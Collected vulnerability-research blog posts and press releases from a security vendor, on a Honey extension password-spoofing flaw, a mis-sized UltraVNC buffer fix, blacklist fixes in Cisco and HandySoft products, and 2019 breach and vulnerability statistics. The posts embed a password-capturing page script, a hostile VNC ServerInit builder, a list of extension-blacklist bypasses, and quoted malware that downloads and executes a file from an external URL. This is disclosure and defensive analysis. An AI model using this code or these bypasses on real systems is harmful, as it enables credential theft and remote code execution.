
RBS Research Team Uncovers Vulnerability in Popular Honey Web Extension

Without the variety of browser extensions available today, the experience of using web browsers would be completely different. They are installed to manage passwords, block advertisements, or integrate functionality of all kinds into the browser.

Most browser extensions sit and wait silently in the background until summoned with a simple click of a button in the browser toolbar. The extensions then usually present a user interface dialog / window to configure or interact with them.

In this regard, the Honey browser extension is no different. The user visits a site and runs the extension to find available coupon codes. According to the vendor, the extension “automatically finds and applies coupon codes at checkout for over 30,000 shopping sites” and has been installed over 10 million times.

However, the extension’s behavior was noticeably different if activated from the browser toolbar. Generally, the UI dialog is positioned slightly over the toolbar, indicating a separate window. In this case, the Honey extension dialog was displayed within the web page area.

Password Checkup extension in comparison to the Honey extension

A quick look using the Google Developer Tools revealed that the Honey UI element was indeed not an overlay on top of the browser window but injected into the web page.

div tag injected to web page by the Honey extension

What does this mean?

This is problematic because the visited web site can now control every element the Honey extension injects, i.e. the extension’s entire user interface, including its login form. With a little JavaScript on a web page that entices the user to activate the Honey extension, an attacker can spoof the extension’s elements and steal user information. As a proof-of-concept, we developed a web page that displays the user’s password as it is entered (in a real-world scenario, the password would be silently saved by the attacker).

Proof-of-concept for stealing passwords
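The attack described above, as an added example written for this page rather than the RBS proof-of-concept or any Honey code: a page script that waits for an extension to inject its UI into the page DOM and hooks whatever password field it finds there. The `[data-ext-ui]` selector is an assumption standing in for the real injected container, and the `sink` callback is where a real attacker would exfiltrate the value. The last function states the contrast with UI rendered in an extension-origin iframe or the toolbar popup, which the host page cannot reach.

```javascript
// Added example, not code from the RBS post or from the Honey extension.
// Any UI an extension injects into the host page's DOM lives in the page's
// own document, so the page's scripts can find it, read it and rewrite it.
// The container selector is an assumption standing in for whatever the
// injected element actually looks like.

const INJECTED_UI = '[data-ext-ui]'; // hypothetical marker on the injected <div>

// Attach an 'input' listener to every password field inside the injected UI
// and hand each value to `sink`. Returns how many fields were newly hooked,
// so repeated calls from an observer callback stay idempotent.
function hookInjectedPasswordFields(root, sink) {
  const fields = root.querySelectorAll(`${INJECTED_UI} input[type="password"]`);
  let hooked = 0;
  for (const field of fields) {
    if (field.dataset.hooked) continue;
    field.dataset.hooked = '1';
    field.addEventListener('input', () => sink(field.value));
    hooked += 1;
  }
  return hooked;
}

// The extension injects its UI only when the user clicks the toolbar button,
// so watch the DOM and hook the form the moment it appears. Returns the
// observer so a caller can disconnect() it.
function watchForInjectedUi(root, sink, ObserverCtor) {
  hookInjectedPasswordFields(root, sink);
  const observer = new ObserverCtor(() => hookInjectedPasswordFields(root, sink));
  observer.observe(root, { childList: true, subtree: true });
  return observer;
}

// The same question from the defender's side. If the extension renders the
// form in an <iframe> whose src is an extension-origin page (listed under
// web_accessible_resources), querySelectorAll() on the host document stops at
// the frame boundary and contentDocument is null across origins, so this
// returns false. Rendering the form in the toolbar popup keeps it out of the
// page entirely.
function pageCanReachInjectedFields(root) {
  return root.querySelectorAll(`${INJECTED_UI} input`).length > 0;
}

// Only arms itself in a browser; under Node the functions above can still be
// exercised with stand-in objects in place of document.
if (typeof document !== 'undefined' && typeof MutationObserver !== 'undefined') {
  watchForInjectedUi(document, (pw) => console.log('captured:', pw), MutationObserver);
}
```

The observer is what makes this practical: the injected container does not exist until the user clicks the toolbar button, so a one-shot `querySelector` on page load would find nothing.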

Of course, other attacks may also be possible. In particular, Google and Facebook authentication dialogs could also be replicated to gain access to user passwords for those accounts. However, this attack is mitigated by the fact that pop-up windows present an address bar, thereby disclosing a spoofed domain, which should (hopefully) be detected by the user before entering a password.

Our Research Team reported the vulnerability to the developers at the end of 2018. A fix was released as version 11.3.0 for Chrome on April 16, 2019 and as version 11.3.5 for Firefox on May 15, 2019. For Edge on Windows, version 11.4.2.0 fixes the issue. Currently, no updated version is available for Safari; Safari users are urged not to activate the extension on untrusted websites.

Research credit goes to Sven Krewitt, Senior Vulnerability Researcher

A Scanning Solution is Only as Good as the Vulnerability Data That Drives it

We had some great conversations at JFrog’s user conference, SwampUp 2019. Brian Martin, our Vice President of Vulnerability Intelligence, took part in an all-star keynote of experts where he discussed how our VulnDB® service helps secure JFrog Xray user pipelines.

The integration of VulnDB allows DevOps teams to discover, receive notifications on, and help remediate vulnerabilities in third-party libraries and dependencies early in the development cycle. As JFrog puts it, “a security scanning solution is only as good as the database of vulnerabilities that drives it.” Driven by Risk Based Security’s comprehensive data, Xray with VulnDB is the best security intelligence solution on the market for developers. 

Why does data from VulnDB give you an edge?

VulnDB is the most comprehensive source of vulnerability data available, with almost 69,000 vulnerabilities that are not found in CVE or the National Vulnerability Database (NVD). As Brian shared in his SwampUP keynote presentation, an average of about 70 new vulnerabilities are disclosed every day. This is an alarming volume, especially if your organization isn’t seeing the complete picture. That’s why our rallying cry is #BetterDataMatters. VulnDB is so much more advanced than any other database because we are looking for vulnerabilities and we speak with the DevOps community to ensure we are monitoring the libraries they are using. VulnDB includes more vulnerabilities, and carries more metadata and research on entries. This allows you to arm your organization with the most complete and up-to-date information available so you can make data-driven decisions to effectively manage and prioritize risk mitigation.

Taking this to mind, let’s look at some real-world applications. Recently, Sophos put out a very thought provoking article. The article made some very interesting points:

  1. Most vulnerabilities aren’t exploited, and if they are, they tend to have a high CVSS score.
  2. There is apparently no relationship between the proof-of-concept (PoC) exploit code being published online and the start of real-world attacks.
  3. In order to patch vulnerabilities, a “reference tagging” machine learning model is the most efficient method.

Sophos based its conclusions on a whitepaper published by researchers from the Cyentia Institute, Virginia Tech, and the RAND Corporation. The findings were extremely engaging; however, the data used to support these claims is lacking in comprehensiveness.

Looking further into the data provided, it’s apparent that the researchers relied very heavily on security sensors based on CVE IDs, meaning that only vulnerabilities within CVE were being considered. This means that there are almost 69,000 vulns being missed in this study. To make matters worse, security scanning devices tend to cover half of the vulnerabilities in CVE, which makes the subset of data even smaller. 

In addition, Risk Based Security believes the machine learning models used in the study may have mis-categorized focused attacks. In situations where someone determines that a remote target is running specific software, then tries a comprehensive list of attacks against it, a detected attack would likely be labeled incorrectly. Since the researchers were basing their findings off of CVE data, it is highly likely that their sensors were not aware of specific vulnerabilities, resulting in a label of “Generic XSS” for example. This could have skewed results.

Last, these types of reports typically don’t share their full methodology, let alone what they are capable of matching against, so there is no way to reproduce or validate their findings. Unfortunately, if the research is based solely on CVE data, several vendors performing a similar study will arrive at the same rough figures. CVE is the industry “standard,” yet it is missing a huge number of vulnerabilities, many of them with high CVSS scores and affecting major vendors. As previously stated, “a security scanning solution is only as good as the database of vulnerabilities that drives it.”

#BetterDataMatters. We would be very interested if the findings presented would be the same if more up-to-date data was used.

Interested in learning more about Risk Based Security’s suite of products? Click here to schedule a demo and see how much more comprehensive VulnDB is compared to other security solutions on the market.

Vulnerabilities disclosed during the first three months of 2019 reach a Q1 all-time high

RICHMOND, VA, May 16, 2019 — Risk Based Security today released the Q1 2019 Vulnerability QuickView Report.

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high.

CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities.

Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD in the first quarter. 45.8% of the vulnerabilities not published by NVD/CVE have a CVSS score of either 7.0 – 8.99 (high) or 9.0 – 10.0 (critical).

“This continues to illustrate the need for a comprehensive vulnerability intelligence feed and a mature process that can quickly determine the true risk and lead the organization to address issues in a risk-based methodology,” commented Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.

Just over half of all reported vulnerabilities in Q1 2019 have a remote attack vector followed by almost a third having a user-assisted or context-dependent attack vector. Unlike previous quarters, over 13% of the reported vulnerabilities require local access to a system or device. While many are quick to dismiss local attacks as less risky, the increasing use of virtual technology and mobile devices may give an attacker a foothold on a device making local privilege escalation attacks more worrisome.

“The year-after-year increase in vulnerabilities being disclosed is clear, but there is no better example of the growing threats than this: in the last 24 hours, while finishing the Q1 2019 report, we pushed 241 new vulnerabilities to VulnDB,” commented Martin. “That should be an eye-opener and a serious concern to any organization, regardless of size or industry.”

Get your copy of the Q1 2019 Vulnerability QuickView Report

About the Vulnerability QuickView Report

The VulnDB QuickView report is possible through the research conducted by Risk Based Security. It is designed to provide an executive level summary of the key findings from RBS’ aggregation of vulnerabilities disclosed in Q1 2019. Contact Risk Based Security for a specific analysis of the vulnerabilities of critical relevance to your organization.

Over 1,900 breaches reported in the first three months of 2019, a new Q1 record

Risk Based Security today announced the release of its Q1 2019 Data Breach QuickView Report, which found that there were 1,903 publicly disclosed data compromise events in the first three months of the year, exposing over 1.9 billion records. No other first quarter has seen this level of activity, putting 2019 on pace to be yet another “worst year on record” for the number of publicly reported breaches.

“The number of data leaks – both in the form of open, unsecured services and credentials leaks – reached new levels this quarter,” commented Inga Goddijn, executive vice president and head of Cyber Risk Analytics. “Researchers are increasingly going public when they discover sizable, unprotected databases containing sensitive information and unfortunately, they aren’t terribly difficult to find when you know where to look.” The report finds that 67.6% of records compromised in Q1 were due to exposure of sensitive data on the Internet.

A particular area of interest for the research team is breach event timelines. Throughout 2018, the QuickView Reports focused on analysis of the time interval between the date an incident is first discovered by the breached organization and the date the incident is first publicly disclosed. Initial research indicated the gap between discovery and disclosure incrementally shrank from 2014 through the first quarter of 2018, but stalled for the remainder of the year.

This lack of improvement prompted a new focus for 2019: digging deeper into the factors that may be influencing why some organizations are quicker to disclose a breach than others. This quarter, analysis focused on whether there is a correlation between discovery method and time to disclose. The theory being, organizations that are better able to detect a breach will also be better positioned to respond swiftly.

In an interesting twist, the data did indeed show there is a correlation between discovery method and time to disclose, but it was not the expected outcome. In Q1 2019, organizations that were alerted to the event from external sources – such as law enforcement, researcher or customer reporting, fraud monitoring or actor disclosure – were on average 31 days quicker to publicly disclose the event than organizations that learned of the incident through internal sources.

“Clearly our hypothesis, that organizations finding their own breaches will report them faster, was dead wrong this quarter,” commented Ms. Goddijn. “We will be following this metric closely throughout the year. For now, it’s too early to say whether the result we found for this quarter is an outlier or a fairly typical outcome.”

About the Data Breach QuickView Report

The Data Breach Quickview Report is made possible through the research conducted by Risk Based Security and Cyber Risk Analytics. It is designed to provide an executive level summary of the key findings from RBS’ analysis of breach activity disclosed in the first quarter of 2019. Contact Risk Based Security for any focused analysis of the breaches of specific interest to your organization.

Get your copy of the Q1 2019 Data Breach QuickView Report

About Risk Based Security

Risk Based Security (RBS) provides detailed information and analysis on Data Breaches, Vendor Risk Ratings and Vulnerability Intelligence. Our products, Cyber Risk Analytics (CRA) and VulnDB, provide organizations access to the most comprehensive threat intelligence knowledge bases available, including advanced search capabilities, access to raw data via API, and email alerting to assist organizations in taking the right actions in a timely manner. In addition, our YourCISO offering provides organizations with on-demand access to high quality security and information risk management resources in one, easy to use web portal.

Cyber Risk Analytics (CRA) provides actionable threat intelligence about organizations that have had a data breach or leaked credentials. This enables organizations to reduce exposure to the threats most likely to impact them and their vendor base. In addition, our PreBreach vendor risk rating, the result of a deep-view into the metrics driving cyber exposures, are used to better understand the digital hygiene of an organization and the likelihood of a future data breach. The integration of PreBreach ratings into security processes, vendor management programs, cyber insurance processes and risk management tools allows organizations to avoid costly risk assessments, while enabling businesses to understand its risk posture, act quickly and appropriately to proactively protect its most critical information assets.

For more information, please visit:
www.riskbasedsecurity.com
cyberriskanalytics.com
vulndb.cyberriskanalytics.com
yourciso.com
or call 855-RBS-RISK

From 4,000 to 40,000 Data Breaches: People are Still the Problem

On May 2, 2019, we hit a data breach milestone. The Cyber Risk Analytics research team added the 40,000th breach entry to our ever expanding data breach database. Coming hot on the heels of the 200,000th vulnerability added to VulnDB, it can be tempting to think much of the breach activity taking place over the years has been the result of the endless onslaught of software weaknesses. After all, it doesn’t take much digging to find high profile breach examples attributed to unpatched vulnerabilities (we’re looking at you, Equifax).

“If we look back through the history of how we got to 40,000 breaches, we can see what a truly difficult task it is to keep sensitive data secure, ” commented Inga Goddijn, EVP for Risk Based Security and head of Cyber Risk Analytics. “Yes, attack methods change over time and patching is more challenging than ever, but breaches can come from anywhere there is data.”

Comparing the 4,000th entry to the 40,000th highlights the point. Back in August of 2007, an employee of Spotsylvania County, Virginia was working in the conference room of a public building. She stepped away for a moment and upon her return, found the laptop she was working on was gone. Typical of the times, 3,000 sensitive records containing the personal information of fellow employees, as well as details from business licenses and property tax bills, were held directly on the machine. The laptop was password protected, but no encryption was applied.

“Stolen laptops were the number one breach type back in 2007, accounting for 22.1% of all reported breaches while exposing 2.9% of records that year,” noted Ms. Goddijn. Fast forward to 2018, and the problem of sensitive data stored on unsecured laptops has been largely addressed. There were still 51 such events in 2018, but those accounted for fewer than 1% of breaches reported. Only 253,374 records were exposed by stolen laptops last year, barely registering in the context of the 5.1 billion total records compromised.

But let’s not celebrate prematurely. Unfortunately, the problem of sensitive data on unprotected equipment has been replaced by that of sensitive data unprotected in the cloud.

The incident at Ladders, Inc. became our 40,000th entry, and in many ways it is just as typical of 2019 as the Spotsylvania County incident was of 2007. On May 1st, it was reported that an open, unprotected Elasticsearch database had been left exposed on the Internet. The AWS-hosted database contained a year’s worth of user profile data and recruiter information. In all, upwards of 13,700,000 records were exposed in the incident.

Moving sizable databases to the cloud has brought configuration concerns that simply were not a problem in 2007. As a result, inadvertent exposure of data on the web accounted for only 4.1% of breaches reported in 2018, yet exposed a whopping 1.9 billion records, 39.1% of the total.

“Unsecured databases have become the stolen laptops of the time,” Ms. Goddijn commented. “We may have conquered the equipment problem, but we are still seeing a multitude of preventable breaches; that is to say the means for avoiding the data loss in the first place is largely within the organization’s control.”

CRA data breach statistics - May 2019


All of the latest breach trends can be found in the soon-to-be-published Q1 2019 Data Breach QuickView Report. Check back here on May 7th, when the report becomes publicly available. In the interim, all the findings from 2018 are still available in our 2018 Year End Report.

Vulnerability Fixes That Make You Go Hmm…

The VulnDB research team processes a large number of vulnerability reports, exploits, and vendor advisories every day. Each report is scrutinized, classified, and added to the VulnDB vulnerability database, enriched with important details such as affected versions and requirements for exploitation, and sometimes with a note that the fix is incorrect.

The lack of available detail in public reports and disclosures often requires us to dig deeper to create the meaningful intelligence VulnDB is famous for. In some cases, our investigations lead our research team to suspect that something doesn’t quite add up.

In early March 2019, Kaspersky Lab published information about a stack-based buffer overflow that caught our attention. While such conditions have the potential to allow code execution, the advisory only lists denial of service (DoS) as the potential impact, and exploitation requires user interaction. This was worth investigating further. The affected versions (“UltraVNC before 1.2.2.3”) and the fix (revision 1206) also raised some questions, but first, let’s evaluate the vulnerability itself.

Looking at the fixing changeset, the affected function ClientConnection::ShowConnInfo() was changed to address the reported stack-based buffer overflow. The overflow appeared to be triggerable by a specially crafted VNC server when the client displays connection information.

screenshot of code including the snprintf function

So far, so good: a sprintf()-type function is replaced by _snprintf() with a buffer length limit. However, looking at a larger part of the function raised some eyebrows.

screenshot of code limiting the size when invoking _snprintf to 20148

The savvy developer may have already spotted the issue. The destination buffer is only 2048 bytes in size, so limiting the _snprintf() call to 20148 bytes does not prevent the buffer overflow; this apparent typo leaves the application prone to the vulnerability. We also downloaded version 1.2.2.3, as “UltraVNC before 1.2.2.3” was reported vulnerable. That’s when we noticed that 1.2.2.3 was released on November 11, 2018, about two months before the fix landed in the repository.


At this point we have:

  • A stack-based buffer overflow, reported as DoS only
  • A typo in the fix, which looks insufficient
  • Ambiguous version information

When it comes to creating VulnDB entries, we are sometimes driven by what we call VulnDB OCD. We decided to keep digging and figure out what was really going on.

To trigger the vulnerability, we need to run a VNC server and control one of the parameters used in the _snprintf() call. This can be done through the name associated with the desktop in the ServerInit message (see RFC 6143, The Remote Framebuffer Protocol). We implemented a proof-of-concept using libvncserver, changing the response in the rfbProcessClientInitMessage() function in rfbserver.c.
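An added example covering both the mis-sized _snprintf() bound discussed above and the ServerInit trigger just described. It is JavaScript written for this page, not the RBS proof-of-concept and not libvncserver or UltraVNC code. buildServerInit() assembles the RFC 6143 ServerInit message a hostile server would send, parseServerInit() is a minimal client-side read of it, and formatConnInfo() models snprintf()-style formatting into a 2048-byte buffer, first under the 20148 bound from revision 1206 and then under the correct bound, reporting whether the write would exceed the real storage. The “Desktop name: ” format text is an assumption; the real ShowConnInfo() format string is not on the page.

```javascript
// Added example, not the RBS PoC and not UltraVNC code.

const CONN_INFO_BUF_LEN = 2048;   // size of the stack buffer described in the post
const TYPO_BOUND = 20148;         // the bound passed to _snprintf() in revision 1206

// ServerInit (RFC 6143, section 7.3.2): u16 framebuffer-width, u16
// framebuffer-height, 16-byte PIXEL_FORMAT, u32 name-length, then
// name-length bytes of desktop name. All integers are big-endian.
function buildServerInit(width, height, pixelFormat, desktopName) {
  if (pixelFormat.length !== 16) throw new Error('PIXEL_FORMAT must be 16 bytes');
  const name = Buffer.from(desktopName, 'latin1');
  const msg = Buffer.alloc(24 + name.length);
  msg.writeUInt16BE(width, 0);
  msg.writeUInt16BE(height, 2);
  pixelFormat.copy(msg, 4);
  msg.writeUInt32BE(name.length, 20);
  name.copy(msg, 24);
  return msg;
}

// Minimal client-side parse. The length field is attacker-controlled: a
// client must bound it before the name goes anywhere with fixed storage.
function parseServerInit(msg) {
  if (msg.length < 24) throw new Error('short ServerInit');
  const nameLength = msg.readUInt32BE(20);
  if (msg.length < 24 + nameLength) throw new Error('truncated desktop name');
  return {
    width: msg.readUInt16BE(0),
    height: msg.readUInt16BE(2),
    desktopName: msg.toString('latin1', 24, 24 + nameLength),
  };
}

// Model of formatting into a buffer of realLen bytes while the call site
// claims it is declaredLen bytes. C99 snprintf writes at most declaredLen-1
// characters plus a NUL; the write overflows when that exceeds realLen.
// (MSVC _snprintf additionally omits the NUL on truncation.) Nothing here
// touches memory out of bounds; it only reports what the C call would do.
function formatConnInfo(desktopName, declaredLen, realLen) {
  const text = `Desktop name: ${desktopName}\n`;   // assumed format text
  const wanted = Buffer.byteLength(text, 'latin1');
  const written = Math.min(wanted, declaredLen - 1);
  return { written, overflowed: written + 1 > realLen };
}

// The two fixes side by side: the typo'd bound and sizeof(buf).
const typoFix = (name) => formatConnInfo(name, TYPO_BOUND, CONN_INFO_BUF_LEN);
const realFix = (name) => formatConnInfo(name, CONN_INFO_BUF_LEN, CONN_INFO_BUF_LEN);

// Constructed hostile ServerInit: a 5000-byte desktop name, benign otherwise.
const hostileInit = buildServerInit(800, 600, Buffer.alloc(16), 'A'.repeat(5000));
const hostileName = parseServerInit(hostileInit).desktopName;
console.log('typo bound   :', typoFix(hostileName));   // overflowed: true
console.log('sizeof bound :', realFix(hostileName));   // overflowed: false
```

The name-length field is the only thing the attacker needs: with 20148 as the bound, any desktop name longer than about 2030 bytes runs past the 2048-byte buffer exactly as before the fix, while the sizeof bound truncates it to 2047 bytes plus the terminator.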

screenshot of vncviewer.exe - pointer to next seh record

When connecting to our VNC server with vncviewer.exe, the stack-based buffer overflow is triggered when the user displays the connection information (e.g. via the title bar context menu). While this allowed us to overwrite a wide range of stack memory, exploitation is mitigated by modern security features such as DEP, SafeSEH, and SEHOP, which is probably why the issue was initially classified as a denial of service. However, at this point a bypass of these features can’t be ruled out. In particular, ASLR (Address Space Layout Randomization) is not enabled for the application, which aids return-oriented programming (ROP) techniques used to bypass e.g. DEP.

(As a side-note: a crash in a client application requiring user interaction, e.g. connecting to a specially crafted VNC server, would not be classified as a vulnerability, but rather a stability issue).

On March 14, 2019, a new version (1.2.2.4) was released that included the insufficient fix. We tested it against our VNC server and, not surprisingly, could still reproduce the stack-based buffer overflow. We then contacted the vendor about the incomplete fix and quickly received a response that the issue was corrected in revision 1216, with the vendor silently updating the 1.2.2.4 download as of March 19, 2019.

The result of our brief excursion:

  • The denial of service non-issue turned out to be potentially exploitable for arbitrary code execution.
  • Version 1.2.2.3 was vulnerable, even though the advisory suggested otherwise.
  • Early downloads of 1.2.2.4 were affected due to a typo in the initial fix.
  • Only version 1.2.2.4 downloaded after March 19, 2019 addresses the vulnerability with a silent fix.

Hmmm indeed.

Learn more about how VulnDB and our research team can equip your security team with better data.

Blacklisting Limitations: Poor Cisco Fixes and Korean 0-days

Using blacklisting to fix vulnerabilities is rarely the right approach. That should not come as a surprise to anyone, and we all know variants of the saying: “The developer has to determine all cases of bad input; the attacker just has to determine the one that was missed.” Yet this does not stop vendors from still resorting to basic blacklisting approaches to “fix” vulnerabilities in their products.

In January 2019, Cisco addressed a vulnerability in their RV320 and RV325 VPN routers that allowed unauthenticated, remote attackers to disclose sensitive diagnostics information. This was possible by accessing the /cgi-bin/export_debug_msg.exp CGI program in the web-based management interface. The proper fix would be to ensure that only authenticated, privileged users can access the CGI program. Cisco decided on a different approach…

Last week, researchers disclosed that Cisco simply restricted access to the CGI program if requests come from curl HTTP user agents. The reason is likely that the PoC provided to Cisco by the researcher was using curl. Naturally, this “fix” is trivial to bypass by simply changing the HTTP user agent being sent as part of the request. Cisco has acknowledged that the original fix is incomplete and that they’re working on a new one.

Cisco is not the only vendor to make mistakes like these. We recently completed a research project for some of our major Korean customers (more on that in a later post). As part of the project we reviewed the July 2014 edition of a monthly report on malicious code trends published by KISA (Korea Internet & Security Agency). On pages 29 and 30, the report shows a JavaScript file with malicious code that exploited a 0-day vulnerability in the HandySoft HShell ActiveX control by combining three unsafe methods.

A snippet of the relevant code:

obj.DownloadFromURL("http://www.sdgfaith.com/files/env/image/jpg/last.gif", "c:\\windows\\temp\\SearchMon.exe", 1, 1);
setTimeout(function() {
   if(obj.IsFileExist("c:\\windows\\temp\\SearchMon.exe"))
      obj.ShellExec("", "c:\\windows\\temp\\SearchMon.exe", "", "c:\\", 0, 0, 0);
}, 20000);

The methods in question are: DownloadFromURL(), IsFileExist(), and ShellExec(). Three method names that one generally does not want to see in safe-for-scripting ActiveX controls, as it is not functionality that websites should have access to.

At some point, the vendor attempted to fix these vulnerabilities. Instead of questioning whether these were sensible functions to have in a safe-for-scripting ActiveX control, the vendor instead opted – similar to Cisco – for a blacklisting approach. A validation function was introduced that restricts the file extensions that are accepted by the DownloadFromURL() and ShellExec() methods. However, the list is hardly exhaustive when it comes to dangerous file types, as it only covers: “.exe”, “.com”, “.bat”, “.cmd”, “.scr”, “.msi”, and “.vbs”. While it successfully blocked the 0-day exploit, there are many obvious dangerous file types not covered by this list. This makes it trivial to tweak the original exploit to bypass the check and still download and execute malicious code on a user’s system when visiting a web page.
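An added example, not Cisco’s or HandySoft’s code, covering both fixes above: the curl user-agent blacklist and the seven-extension blacklist rebuilt as small checks, each next to the check that addresses the root cause (an authentication test, and a whitelist). The session lookup, the whitelist contents and the bypass file types are illustrative assumptions.

```javascript
// Added example, not vendor code. Two blacklist "fixes" and their bypasses,
// next to checks that address the root cause instead.

// Cisco-style: the CGI handler refuses "curl" user agents and nothing else.
function exportDebugAllowedByUaBlacklist(req) {
  return !/curl/i.test(req.headers['user-agent'] || '');
}

// Root-cause fix: answer only authenticated, privileged sessions and never
// consult the User-Agent. `sessions` is a stand-in for the real session store.
function exportDebugAllowedByAuth(req, sessions) {
  const session = sessions.get(req.cookies && req.cookies.session);
  return Boolean(session && session.role === 'admin');
}

// HandySoft-style: the vendor's validation blocks exactly these extensions
// before DownloadFromURL() / ShellExec() proceed.
const BLOCKED_EXTENSIONS = ['.exe', '.com', '.bat', '.cmd', '.scr', '.msi', '.vbs'];

function downloadAllowedByExtensionBlacklist(targetPath) {
  const lower = targetPath.toLowerCase();
  return !BLOCKED_EXTENSIONS.some((ext) => lower.endsWith(ext));
}

// Whitelist alternative: only the file types the feature genuinely needs
// (hypothetical list). For a control that fetches arbitrary URLs to disk and
// can ShellExec() the result there is no safe list at all, which is the
// post's point: the design, not the filter, is the problem.
const ALLOWED_EXTENSIONS = ['.txt', '.pdf'];

function downloadAllowedByExtensionWhitelist(targetPath) {
  const lower = targetPath.toLowerCase();
  return ALLOWED_EXTENSIONS.some((ext) => lower.endsWith(ext));
}

// Constructed inputs an attacker would try once the original PoC is blocked.
const CURL_UA = { headers: { 'user-agent': 'curl/7.64.0' } };
const BROWSER_UA = { headers: { 'user-agent': 'Mozilla/5.0' } };
const BYPASS_PATHS = [
  'c:\\windows\\temp\\SearchMon.hta',  // HTML Application, runs via mshta.exe
  'c:\\windows\\temp\\SearchMon.js',   // Windows Script Host
  'c:\\windows\\temp\\SearchMon.wsf',  // Windows Script File
  'c:\\windows\\temp\\SearchMon.pif',  // treated as an executable by Windows
];

// Which of the candidate paths slip past a given check.
function bypasses(check, paths) {
  return paths.filter((p) => check(p));
}

console.log('UA blacklist, browser UA :', exportDebugAllowedByUaBlacklist(BROWSER_UA)); // true
console.log('blacklist bypasses       :', bypasses(downloadAllowedByExtensionBlacklist, BYPASS_PATHS).length); // 4
console.log('whitelist bypasses       :', bypasses(downloadAllowedByExtensionWhitelist, BYPASS_PATHS).length); // 0
```

The two halves fail the same way: a blacklist encodes the one input the vendor was shown, so the attacker only has to pick a different user agent or a different executable file type. The authentication check and the whitelist do not depend on knowing what the attacker will send.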

Full details on the vulnerability are available in our research report.

In general, if a vendor’s immediate idea for fixing a vulnerability is to introduce a blacklist, they should pause and reconsider. What is the vulnerability’s root cause? In most cases, there is a much better way to solve it. If restrictions still seem like the right approach, the default should be a very limited whitelist. If a vendor can’t think of a good whitelist, they probably can’t come up with a good blacklist. In such cases, it’s very likely that the design of the functionality is just insecure.

200,000th Vulnerability Added To VulnDB (And Why You Should Care)

RICHMOND, VA, March 29, 2019 — Risk Based Security today announced the addition of the 200,000th vulnerability to VulnDB, the preeminent database of vulnerability intelligence. This significant record highlights the scale of the security challenges faced by organizations, and the sheer volume of data that they need to be able to process.

“With over 4,800 new vulnerabilities already disclosed in 2019, we are seeing an early indication that the security problems organizations have been facing aren’t going away this year, or anytime soon,” commented Jake Kouns, CISO for Risk Based Security.

The 200,000th addition is a reflected cross-site scripting (XSS) vulnerability [VulnDB ID 201564] in the popular Malware Information Sharing Platform (MISP). This milestone reflects the steady and ongoing disclosure of vulnerabilities in every type of software, even that which is designed to help achieve security.

The recently published 2018 Year End Vulnerability QuickView Report found that there were more than 22,000 new vulnerabilities disclosed in 2018. Risk Based Security’s VulnDB research team works hard to ensure that they track any vulnerability, but most important are the issues that could impact their customers. Their focus on having the broadest and most detailed intelligence possible has pushed VulnDB to have catalogued 33% more disclosed vulnerabilities than are tracked by the industry-standard public sources, Common Vulnerabilities and Exposures (CVE) or the National Vulnerability Database (NVD). VulnDB is able to provide organizations with the intelligence they need to make more informed risk decisions based on over 66,000 additional vulnerabilities only captured in VulnDB.

The wider implication is clear: without better data, organizations cannot accurately prioritize critical issues. Risk Based Security’s mission is to ensure their clients have access to the data they require. “To understand what motivates us, look no further than our company name,” commented Jake Kouns. “We provide a platform and superior intelligence so our clients can make Risk Based Security decisions on how to better handle vulnerabilities and understand the vendor and products they rely on.”

“As the tools that help researchers find vulnerabilities improve, and as that pool of researchers grows, the rate of disclosures will continue to rise. Organizations will be forced to dedicate more time and resources to keep up with the risks posed,” said Brian Martin, VP of Vulnerability Intelligence at Risk Based Security.


About VulnDB

VulnDB is the most comprehensive and timely vulnerability intelligence available and provides actionable information about the latest in security vulnerabilities via an easy-to-use SaaS Portal, or a RESTful API that allows easy integration into GRC tools and ticketing systems.

VulnDB allows organizations to search and be alerted on the latest vulnerabilities, both in end-user software and 3rd-party libraries or dependencies. It features simple to understand ratings and metrics on their vendors and products, and how each contributes to the organization’s risk-profile and cost of ownership.

VulnDB, by the numbers:

  • 200,000 vulnerabilities all time and growing
  • Over 4,900 vulnerabilities YTD 2019
  • Over 66,000 vulnerabilities missing from CVE
  • Over 22,000 vendors included

Learn more about VulnDB or request a demo.


More Than 22,000 Vulnerabilities Disclosed In 2018

The report confirms that CVE / National Vulnerability Database (NVD) continues to face challenges staying up-to-date with the relentless pace of new disclosures. The VulnDB research team at Risk Based Security (RBS) catalogued 6,780 more vulnerabilities than CVE/NVD. This is notable as it represents nearly 31% of all the published vulnerabilities in 2018.

RBS VP of Vulnerability Intelligence, Brian Martin advises, “Companies can’t afford to miss almost a third of vulnerabilities each year. It is time to move from a ‘good enough’ mentality and toward the paradigm of ‘Better Data Matters’ that Risk Based Security and its VulnDB research is built upon. Missing 31% is unacceptable in today’s cyber landscape, especially when tools are available to prevent it.”

Of the 6,780 vulnerabilities not published by CVE/NVD, 45.5% have a CVSSv2 score between 7.0 and 10.0, and 13.6% scored between 9.0 and 10.0. This once again calls attention to the importance of having a comprehensive view into vulnerability activity. Martin added, “No organization can afford to ignore a single vulnerability ranked between a 7 and 10, let alone over 3,000 of them!” These vulnerabilities cover a wide variety of software including web browsers, enterprise tools, and third-party libraries that impact hundreds or thousands of software packages.

The most significant vulnerability attack type for 2018 is Input Manipulation. “68.7% of the disclosed vulnerabilities are due to insufficient or improper input validation,” expounds Martin, “While a lot of vulnerabilities fall under this umbrella, including cross-site scripting, SQL injection, shell command injection, and buffer overflows, it underlines that software developers still struggle to carefully validate untrusted input. Having a mature SDL that includes secure coding practices can iron out many such issues and significantly reduce the threat from attackers.”

The Vulnerability QuickView report also shows that 32.7% of 2018’s vulnerabilities have public exploits and 50.5% can be exploited remotely, meaning that few of the reported vulnerabilities require any type of physical proximity to a system or device to be exploited. Another revealing finding: 27.1% of vulnerabilities had no known solution, which unfortunately is up 5% from 2017 based on current data. And for those following the hot topic of bug bounty programs, almost 8% of vulnerabilities were coordinated through bug bounty programs – a solid increase from the 5.8% last year.

Notably, SCADA vulnerabilities are on the rise. 3.5% of 2018 vulnerabilities were classified as SCADA vulnerabilities, double that of last year. The report notes that this will be an area to keep an eye on as more SCADA systems become internet accessible for convenience without full realization of the safety risks and ramifications.

About the Vulnerability QuickView Report

